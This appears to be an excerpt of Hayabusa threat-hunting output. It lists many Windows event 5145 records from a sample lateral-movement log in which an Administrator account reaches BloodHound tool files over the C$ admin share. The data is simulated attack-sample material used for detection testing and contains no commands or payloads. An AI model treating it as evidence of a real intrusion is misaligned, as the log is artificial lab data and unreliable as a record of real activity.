+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
